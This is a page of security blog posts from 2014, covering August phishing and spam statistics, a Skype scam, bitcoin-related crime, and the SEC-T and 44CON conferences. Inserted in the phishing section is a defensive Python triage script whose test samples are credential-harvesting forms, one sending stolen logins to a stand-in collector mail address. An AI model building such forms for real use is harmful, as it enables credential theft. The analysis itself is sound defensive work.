The statistics on phishing targets are based on detections made by Kaspersky Lab's anti-phishing component. It is activated every time a user enters a phishing page that has not previously been included in Kaspersky Lab databases. It does not matter how the user enters this page – by clicking the link contained in a phishing email or in the message in a social network or, for example, as a result of malware activity. After the activation of the security system, the user sees a banner in the browser warning of a potential threat.

In August, there was little change among the organizations most often attacked by phishers. Global Internet Portals remained the leading category with 30.8%; its share increased by 1.3 pp. Social networks came second with 17.3%, a 3.3 pp decline from the previous month. These two categories accounted for more than half of all phishing attacks in August.

Organizations most frequently targeted by phishers, by category – August 2014

Financial phishing accounted for 35.2% of all attacks, a 6.6 pp drop compared with the previous month. The percentage of detections affecting Banks, Online stores and E-payment systems went down 4.9, 1.2 and 0.6 pp respectively.

Top 3 organizations most frequently targeted by phishers

     Organization   % detections
1    Google         12.61%
2    Facebook       10.05%
3    Yahoo!         6.38%

In August, Google services were most heavily targeted by phishing links: their share was up 1 pp and had 12.61% of all Anti-Phishing component detections. Second was Facebook, which is traditionally the most popular phishing target. Its contribution increased by 0.4 pp. It is followed by Yahoo! (6.38%). To recap, in July third position was occupied by Windows Live.

In August spam traffic we came across several phishing mailings targeting logins and passwords for Yahoo! services. The emails read that the Yahoo! administration had registered attempts to enter the user's account from an unidentified device. This activity caused suspicion and the account would be blocked if the recipient did not confirm the username and password on a special page. The body of the email contained two links for verification of the personal data: the first one to confirm the password and prevent blockage, and the second one to protect the account in case the entry had been performed by anyone else. Both links had the same address and led to the same phishing page. The text of the messages in different mass mailings remained almost unchanged and the design of the emails used the Yahoo! logo.

The phishing page in one mass mailing was an exact copy of the official registration page, but in the other mailing a different background was used.

If you look at the HTML code of the phishing pages, it becomes clear that in the first case the victim's data was sent to the PHP page of the fraudsters while in the second case it was forwarded to an email address registered on a free email service. The HTML code also specified the address which would be entered in the 'From' field as well as the subject of the email. This enabled the fraudsters to identify the information about usernames and passwords received from the users within each mass mailing.
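The inspection described above can be scripted when triaging captured phishing pages. This is an added example, not code from the original report: it parses a saved page and reports, for each password-collecting form, where the data is submitted and whether hidden fields carry mail addresses. The two sample pages, their URLs and the field names (recipient, from, subject) are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


class FormCollector(HTMLParser):
    """Collect every <form> with its action and the attributes of its <input>s."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._open = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._open = {"action": attrs.get("action") or "", "inputs": []}
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            self._open["inputs"].append(attrs)

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None


def triage(page_url, html):
    """Report where each password-collecting form on a captured page sends its data."""
    collector = FormCollector()
    collector.feed(html)
    page_host = urlparse(page_url).hostname
    reports = []
    for form in collector.forms:
        kinds = [(i.get("type") or "text").lower() for i in form["inputs"]]
        if "password" not in kinds:
            continue  # e.g. a search box: not a credential form
        # A relative or empty action resolves against the page's own URL.
        target = urljoin(page_url, form["action"])
        hidden = {i["name"]: i.get("value") or ""
                  for i in form["inputs"]
                  if (i.get("type") or "").lower() == "hidden" and i.get("name")}
        found = set()
        for value in hidden.values():
            found.update(EMAIL.findall(value))
        if urlparse(target).scheme == "mailto":
            found.update(EMAIL.findall(target))
        reports.append({
            "target": target,
            "channel": "email" if found else "http",
            "off_site": urlparse(target).hostname not in (None, page_host),
            "mail_addresses": sorted(found),
            "hidden_fields": hidden,
        })
    return reports


# Constructed sample 1: data posted to a PHP page on the same host.
PAGE_A_URL = "http://phish-a.example/signin/index.html"
PAGE_A_HTML = """
<form action="/search"><input type="text" name="q"></form>
<form method="post" action="check.php">
  <input type="text" name="login">
  <input type="password" name="passwd">
</form>
"""

# Constructed sample 2: data relayed by mail; hidden fields set From and subject.
PAGE_B_URL = "http://phish-b.example/verify.html"
PAGE_B_HTML = """
<form method="post" action="http://forms.example/cgi-bin/mailer">
  <input type="hidden" name="recipient" value="collector@freemail.example">
  <input type="hidden" name="from" value="batch07@phish-b.example">
  <input type="hidden" name="subject" value="batch 07">
  <input type="text" name="login">
  <input type="password" name="passwd">
</form>
"""

if __name__ == "__main__":
    for url, html in ((PAGE_A_URL, PAGE_A_HTML), (PAGE_B_URL, PAGE_B_HTML)):
        print(url, triage(url, html))
```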

Conclusion

The percentage of spam in August's email traffic averaged 67.2%, which is only 0.2 percentage points up from July. The rating of the most popular sources of spam remained unchanged from July – the USA (15.9%), Russia (6%) and China (4.7%).

In August, scammers continued to spread "Nigerian letters" calling for help in the fall-out from the crisis in Ukraine. English-language emails supposedly written on behalf of an associate of the former Ukrainian president Viktor Yanukovych asked for assistance in investing money. Mikhail Khodorkovsky's on-going story was yet another pretext used by scammers to lure money from the victims.

Malicious emails imitating court summons were often seen in August's spam traffic. These messages were written in different languages and the attached malicious files were developed both to steal personal information and to extort money for decrypting files on the victims' computers.

To advertise pharmaceutical spam, scammers used fake notifications from the online Google Play store. The links in them led to pages advertising popular medications.

In August, spammers actively promoted the services of travel and debt collection agencies.

August's list of most widely-distributed malware was topped by Trojan.JS.Redirector.adf. The long-term leader Trojan-Spy.HTML.Fraud.gen maintained 2nd position in the rating.

In August 2014, Kaspersky Lab's anti-phishing component registered 32,653,772 detections which is 12,495,895 detections more than in the previous month. Australia was the country most often attacked by phishers: during the month the number of the Anti-Phishing component activations on computers of Australian users doubled and accounted for 24.4%. The Global Internet Portals category remained the sector most frequently targeted by phishers (30.8%). Financial phishing accounted for 35.2% of all attacks, a 6.6 pp drop compared with the previous month. Yahoo! entered the Top 3 organizations most frequently targeted by phishers.

Russian-speaking fraud on Skype

Thu, 09/25/2014 - 03:42

It used to be a common scam: Russian cybercriminals would send an SMS like: "Mom, I'm in trouble. Please, transfer me some funds. I will explain it properly when I get home". A whole bunch of friends and relatives got suckered by this fraud, believing that the message had genuinely come from someone close to them.

Fortunately, Russian mobile operators cracked down hard on this, forcing the criminals to give up. But now they've moved on to Skype. Yesterday I got this Skype message from one of my contacts:

Translation of the text:
Hey. I'm on a trip right now and I can't get to a payment terminal and top up my balance. Could you please transfer 100 rubles – or even better 200 – to the number +7925XXXXXXX? I can't think of anyone else who could help me. It would really do me a big favor! I'll pay you back as soon as I get home!!

What happened? The cybercriminals stole my contact's password, probably using password stealing malware. Suddenly, even a Skype account without any money attached is worth something to a crook.

The victim will never see that couple of hundred rubles again. The number mentioned belongs to the cybercriminals, not to the Skype account-holder. It's impossible to say how many people fall victim to this kind of social engineering fraud, but in general we know that social engineering is an effective trick for scammers.

Well, that escalated quickly

Thu, 09/25/2014 - 03:00

An interesting title felt just about right for an interesting topic when I first submitted my research paper about the evolution of bitcoin cybercrime for this year's edition of the Virus Bulletin conference, held in sleepless Seattle. Discussing the situation from an economic standpoint I aimed to paint a picture reflecting how the present geopolitical situation in Latin America makes the region a fertile ground for bitcoin enthusiasts, and by extension, cybercriminals. It's certainly not easy to capture a snapshot of a phenomenon that changes so rapidly and present it to a group of security experts who are already well-informed about the subject. Nevertheless, with the aid of regional statistics, incident timelines and analysis of the most interesting malware samples, there is enough information in the report to give some clear indicators about what's been going on with the world's most popular cryptocurrency this past year, and what we can expect in the future when it comes to bitcoin-related cybercrime.

While some early adopters have been involved in the bitcoin market from the beginning (by means of mining or simply by participating in exchanges), others are just grasping the concept of cryptocurrencies and learning about the perils of bitcoin the hard way – be it in the form of ransomware demanding a quick payment or malicious mining code consuming their limited computing resources. From wallet stealing malware to large scale bitcoin exchange heists, we can find just about anything in the cryptoworld, and this is just the beginning. Nowadays, we talk about malware and cybercrime as two sides of the same (bit)coin, usually referring to organized crews of criminals with clearly defined roles engaging in illegal activities with the sole purpose of financial profit. It makes sense then, to observe the correlation between the number of malware samples in the wild targeting bitcoin users and the price of the currency being exchanged on global markets.

More users, more attacks: Kaspersky Lab stats show a surge in Bitcoin cybercrime

As mentioned in 2013's Kaspersky's Security Bulletin, our predictions for the cybercriminal bitcoin ecosystem came true – and then some: "Attacks on Bitcoin pools, exchanges and Bitcoin users will become one of the most high-profile topics of the year.  Attacks on stock exchanges will be especially popular with the fraudsters as their cost-to-income ratio is very favorable.

As for Bitcoin users, in 2014 we expect considerable growth in the number of attacks targeting their wallets. Previously, criminals infected victim computers and went on to use them for mining. However, this method is now far less effective than before while the theft of Bitcoins promises cybercriminals huge profits and complete anonymity."

It's a long time since we got through a week without one of the major bitcoin exchanges making headline news. We can attribute the success of some attacks to faulty technical implementations of bitcoin wallets, others relied on clever social engineering approaches, and the rest can be blamed on bad business practices and simple negligence about adhering to already proven security standards. There are just too many incidents to list, but there is a common thread uniting them all, which makes them a great body of experience for future generations of bitcoin exchanges to build on.

We have only recently seen why countries like Argentina and Brazil have become a fertile ground for the adoption of a cryptocurrency economy, and as we realize this, so too have cybercriminals. With a whole new set of frauds, scams and threats facing bitcoin holders, citizens need to be aware that keeping their savings secure is no easy task in today's hyper-connected world. Because there are no borders for cryptocurrencies, there are none for criminals either, and following the money trail means landing in Latin America, where the general audience is still widely vulnerable to many attacks seen in other parts of the world.

After the Mt. Gox incident we have witnessed targeted phishing campaigns, bitcoin community members moonlighting as private investigators, localized ransomware samples, scams, mobile miners, internet of things devices participating in botnets, and everything else that this digital bitcoin gold rush has brought upon us.

Analysis of Malware from the Mt. Gox Leak Archive

Being your own bank is more difficult than it seems

Alchemy proved possible for cryptocurrency enthusiasts, turning energy into capital, betting on the success and global adoption of their favorite choice. Seen by outsiders as a hobby for geeks, bitcoin is more than a currency, it's a community that has certain values ingrained and it's revolutionizing the financial world as we currently know it.

Collective but anonymous, organized yet decentralized, this ordered chaos is beginning to make sense after all the problems it has faced. The culling of the excess exchanges that used to be available brings a Darwinian equilibrium to the bitcoin ecosystem, forcing the ones left to implement better business practices and security measures.

Malware trends indicate that cybercriminals are migrating from mining botnets and pools to more direct wallet stealing and exchange credential hijacks. The inefficient mining Trojans working on mobile devices proved that accessing the funds stored in the victim's digital wallet can be much more straightforward than putting the effort into building a massive network of miners that reap minimal gains.

Debit Cards linked to bitcoin wallets are starting to appear and this brings another enticing entry point for criminals. With "bitwashing" services becoming more common, tracking stolen funds will prove much more difficult in the future, exposing the true anonymous nature of cryptocurrencies.

Once the de-facto choice for drug dealers and illegal markets, bitcoin is aiming to gain the global trust of other merchants, hoping that it will have a ready-made community to support it when it becomes the default standard for online and offline transactions. You can read the full paper presented at Virus Bulletin here.

September's 3x CON: Part 2

Wed, 09/24/2014 - 12:00

What, Where & When: The 0x07th edition of SEC-T, an annual Stockholm-based conference, was held on 18-19 September at the stunning Anrika Nalen venue, just a 15 minute walk from the famous Gamla Stan.

The Schedule
This conference features only one track of presentations, which – in my opinion – is quite a good thing, because you don't have to make any difficult choices. This year, besides the regular full-time presentations, the agenda included a couple of 30-minute long "small talks" as well as a bunch of lightning talks of 10-20 minutes each.

SEC-T badge

The Talks
The conference kicked off with an excellent speech given by the founder of Recurity Labs, Felix "FX" Lindner, who has proven that an opening keynote doesn't necessarily have to be boring. After lunch, Andreas Lindh presented some really cool attacks on broadband modems, including DNS poisoning and attacks that exploit CSRF vulnerabilities to send or manipulate SMS messages. This was certainly one of my favourite talks, together with the really scary presentation given by Hugo Teso on aviation security. It's terrifying how easily an experienced hacker can exploit aviation protocols and avionics systems to change the on-board system configuration, including changes to the flight path!

The keynote

Amongst other talks, Meredith L. Patterson highlighted some pressing issues concerning the APIs of popular software, but, apparently, not everybody agrees with her highly-critical point of view. At the beginning of the second day, my colleague, David Jacoby, gave an entertaining presentation on how he hacked his home, including successful attacks on his NAS storage, ISP provided router, smart TV and other devices he found connected to the Internet.

Last, but not least, there were also some short but interesting lightning talks from a number of speakers (including myself :)) on topics such as URL parsing, hard drive cryptography and breaking out of the AngularJS sandbox. I did a short presentation about my background research on the current threat landscape for SOHO devices, which turned out to be quite in line with the conference's theme, featuring research on vulnerabilities in the so-called Internet-of-Things.

The Crew

In conclusion, this was a really nice conference, profiting from its one-track only schedule, very high-quality presentations and unique atmosphere. Congrats to the whole SEC-T crew – really good job, guys! And see you all next year!

September's 3x CON: Part 1

Tue, 09/23/2014 - 10:11

What, Where & When: the 4th edition of 44CON, an annual IT Security Conference organized by Sense/Net Ltd, took place on 10-12 September in London, at a venue near the Earl's Court exhibition center. Geeks who happened to enjoy somewhat spooky historical monuments could take a five minute walk from the venue to visit an old and impressive cemetery, one of London's Magnificent Seven.

The Schedule this year was packed with three tracks of (mostly) 1h long presentations within a wide range of topics: from social engineering to exploitation techniques, from crypto-currencies to IoT related threats, to GSM hacking. Some amazing workshops were running simultaneously in rooms that were bearing the familiar names of AES, 2DES and Blowfish.

44CON Badge: BusBlaster v3

This year's Badge is not only extremely handsome, but also may turn out to be very handy, at least for hardware-oriented researchers, as it happens to be a BusBlaster v3 board, especially customized for 44CON (you can find the full specification here). This small cute thingy can be used to program and debug embedded ARM devices.

The Talks
With so many things going on simultaneously, it was impossible to fully attend even a third of them. Moreover, the online schedule didn't include the description of the talks, so in some cases choosing the right track in advance was kind of a lottery. Nevertheless, the overall quality of presentations was so high, that no matter which talks you chose, you always ended up with some new, valuable information.

Joshua J. Drake on the stage

From the selection of very good talks I attended, here are my favourite ones:

  • "Researching Android devices security with the help of a droid army", by Joshua J. Drake (@jduck) in which – in a quite entertaining way – Joshua explained how and why he built his research lab, capable of testing 40+ Android devices at the same time. I was really impressed by the framework Joshua invented for managing his "droid army".
  • "I hunt TR-069 Admins: pwning ISPs like a boss", by Shahar Tal (@jifa). This talk was especially interesting to me, as I'm currently involved in researching threats for small network devices, such as residential gateways (aka SOHO routers), a fair share of which use the TR-069 protocol to talk to the ISP's Auto Configuration Servers. It turns out (not really surprisingly, if you ask me), that this protocol is poorly secured and highly vulnerable, and might be exploited in a way that could affect a whole set of devices. And the worst thing about it is that the average user can't do much to improve the security of their network, even if they have sufficient knowledge. Most of the responsibility lies with the service providers, together with hardware vendors, who don't seem concerned enough about security issues...
  • "On Her Majesty's Secret Service: GRX and Spy Agency", by Stephen Kho and Rob Kuiters. This quite intriguing talk on how and why GCHQ hacked the Belgian GRX provider was given by experts from the KPN CISO team and concluded the 2nd day of the conference. The first part of the talk was a technical description of the GRX protocol, its functionality and weaknesses, and which kind of information can be leaked; in the second part the speakers presented the results of "extensive network scanning" that they conducted during the last several months. It's really scary that there are a lot of devices running vulnerable and *terribly* outdated software on GRX networks.

Socializing at 44CON

The Networking has been made easier with Gin O'Clock, a one-hour break in the afternoon schedule (on both conference days), which was especially dedicated to human interaction and socialization in the intimate atmosphere of the conference bar. A traditional red double-decker bus was there to provide British ale, cider and Pimm's; every attendee was also offered a free glass of gin & tonic.

Some of The Materials have already been published and they are available at Slideshare.

Overall, The Experience was really great and we are looking forward to attending the next 44CON in 2015!